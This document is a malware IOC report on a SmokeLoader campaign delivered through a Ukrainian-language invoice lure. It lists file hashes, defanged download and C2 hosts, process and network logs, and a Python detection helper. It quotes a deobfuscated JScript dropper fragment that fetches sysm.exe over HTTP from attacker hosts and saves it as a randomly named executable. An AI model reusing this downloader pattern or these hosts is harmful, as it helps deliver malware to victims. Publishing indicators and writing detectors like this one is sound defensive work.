- #IOC #OptiData #VR #smokeloader #WSH #LZH
- https://pastebin.com/JmthzrL4
- previous contact:
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- attack_vector
- --------------
- email attach (lzh) > js > WSH > HTTP GET > %AppData%\Microsoft\Windows\Templates\<random number>.exe
- email_headers
- --------------
- n/a
- files
- --------------
- SHA-256 59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d
- File name Рахунки ТОВ Техник.lzh (lure name, Ukrainian/Russian: "Invoices, Tekhnik LLC")
- File size 26.37 KB
- SHA-256 d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46
- File name 11_2018p.xlsx
- File size 12.28 KB
- SHA-256 fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10
- File name pax. 00-128 corp. TEXHIK.xls.js
- File size 13.99 KB
- SHA-256 0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21
- File name sysm.exe
- File size 518.5 KB
- activity
- **************
- deobfuscated_script
- dropper_script:
- var wsh = new ActiveXObject("wscript.shell");
- var path = wsh.SpecialFolders("templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
- try { var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
- var sh = new ActiveXObject("shell.application");
- HTTP.Open("GET", "h11p:\ districoperav{.} icu/neifo/sysm.exe", false)
- else
- HTTP.Open("GET", "h11p:\ varanasiclick{.} ru/neifo/sysm.exe", false)
- netwrk
- --------------
- wscript.exe 2872 79.133.98.58 80 ESTABLISHED
- comp
- --------------
- 79.133.98.58 districoperav{.} icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0
- C2 h11p:\ aviatorssm{.} bit/
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"
- "C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"
- persist
- --------------
- n/a (detects vm, sleeps)
- drop
- --------------
- C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe
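Added triage example (not part of the original paste): a small Python checker that turns the indicators above into host- and network-side matches. The hashes, hosts, IP, URI and the two process command lines are copied from the report; the drop-name range is derived from the dropper's own expression `(Math.random()*999999)+9999|0`, which yields an integer in [9999, 1009997], so the payload always lands in the Templates special folder as a 4-to-7-digit `.exe`. The benign `logon.js` line and the function names (`is_dropper_path`, `classify_process`, `classify_network`, `scan`) are constructed for this example.

```python
"""Triage helper for the SmokeLoader WSH-dropper chain described in the report above.
All IOC values come from the report; sample telemetry below is constructed."""
import re

# File hashes from the report, mapped to the role each file plays in the chain.
IOC_SHA256 = {
    "59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d": "lzh attachment",
    "d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46": "11_2018p.xlsx decoy",
    "fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10": "js dropper",
    "0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21": "sysm.exe payload",
}
IOC_HOSTS = {"districoperav.icu", "varanasiclick.ru", "aviatorssm.bit"}
IOC_IPS = {"79.133.98.58"}
IOC_URI = "/neifo/sysm.exe"

# Dropper names the payload (Math.random()*999999 + 9999) | 0 -> [9999, 1009997].
DROP_MIN, DROP_MAX = 9999, 1009997
DROP_RE = re.compile(
    r"\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\(\d+)\.exe$", re.IGNORECASE)
# wscript.exe started with a double-extension script (e.g. "...xls.js").
DOUBLE_EXT_JS_RE = re.compile(r"\.(?:xls|xlsx|doc|docx|pdf)\.js\"?\s*$", re.IGNORECASE)
# wscript.exe holding an outbound HTTP/HTTPS socket (the GET is made from the script host).
WSCRIPT_HTTP_RE = re.compile(r"^\s*wscript\.exe\b.*\s(?:80|443)\s", re.IGNORECASE)


def is_dropper_path(path: str) -> bool:
    """True if path is Templates\\<n>.exe with n inside the dropper's random range."""
    m = DROP_RE.search(path.strip().strip('"'))
    return bool(m) and DROP_MIN <= int(m.group(1)) <= DROP_MAX


def classify_process(cmdline: str) -> list[str]:
    """Flag the two process patterns seen in the chain."""
    hits = []
    if "wscript.exe" in cmdline.lower() and DOUBLE_EXT_JS_RE.search(cmdline):
        hits.append("wscript.exe running a double-extension .js")
    if is_dropper_path(cmdline):
        hits.append("exe launched from Templates with random numeric name")
    return hits


def classify_network(line: str) -> list[str]:
    """Flag IOC IPs/hosts/URI and wscript.exe making HTTP connections."""
    hits = []
    low = line.lower()
    hits += [f"IOC IP {ip}" for ip in IOC_IPS if ip in low]
    hits += [f"IOC host {host}" for host in IOC_HOSTS if host in low]
    if IOC_URI in low:
        hits.append(f"payload URI {IOC_URI}")
    if WSCRIPT_HTTP_RE.search(line):
        hits.append("wscript.exe with outbound HTTP socket")
    return hits


def scan(records: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """records: (kind, text) with kind in {proc, net, hash}; returns (kind, finding, text)."""
    findings = []
    for kind, text in records:
        if kind == "proc":
            hits = classify_process(text)
        elif kind == "net":
            hits = classify_network(text)
        elif kind == "hash":
            role = IOC_SHA256.get(text.strip().lower())
            hits = [f"known hash: {role}"] if role else []
        else:
            hits = []
        findings.extend((kind, h, text) for h in hits)
    return findings


# Constructed sample telemetry: the proc/netwrk/comp lines from the report plus a
# benign wscript.exe line that must not fire.
SAMPLE = [
    ("proc", r'"C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax. 00-128 corp. TEXHIK.xls.js"'),
    ("proc", r'"C:\Users\operator\AppData\Roaming\Microsoft\Windows\Templates\120598.exe"'),
    ("net", "wscript.exe 2872 79.133.98.58 80 ESTABLISHED"),
    ("net", "79.133.98.58 districoperav.icu GET /neifo/sysm.exe HTTP/1.1 Mozilla/4.0"),
    ("hash", "0D4560C8EA5614F83CD6D33FD695CBBDADE3CA7D93916673C9A51DE814282B21"),
    ("proc", r'"C:\Windows\System32\WScript.exe" "C:\Scripts\logon.js"'),  # benign, constructed
]

if __name__ == "__main__":
    for kind, finding, text in scan(SAMPLE):
        print(f"[{kind}] {finding}: {text}")
```

The numeric-name check is the piece worth keeping after the hashes and domains rotate: any executable in the Templates folder whose name is a bare 4-to-7-digit integer is something a normal user or installer never creates.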
- # # #
- lzh https://www.virustotal.com/#/file/59e8acea6e292c7e2efde125dc8d4ddeb7c9e91ceff578866c6b725a41145c9d/details
- xlsx https://www.virustotal.com/#/file/d54718754d68db8acc82a091b1eb098bb35dfdf0a3cc7c8227030a2787d2ff46/details
- js https://www.virustotal.com/#/file/fb9cfe3f02d645f1127c0d9133954a107afd4c99e09295800b85053be5c88c10/details
- url1 https://www.virustotal.com/#/url/d1aef86fefbdd3fa733f4ea8068e038ef5c39e112f50a7ccaedbc1bb2ffcf03a/details
- url2 https://www.virustotal.com/#/url/b5758fb74969c0c998286e5bb2c0242e507a1e6037a3785b03edf2174bca878e/detection
- exe https://www.virustotal.com/#/file/0d4560c8ea5614f83cd6d33fd695cbbdade3ca7d93916673c9a51de814282b21/details
- https://analyze.intezer.com/#/analyses/08a7d313-03dd-4d6f-9f67-b662f083a559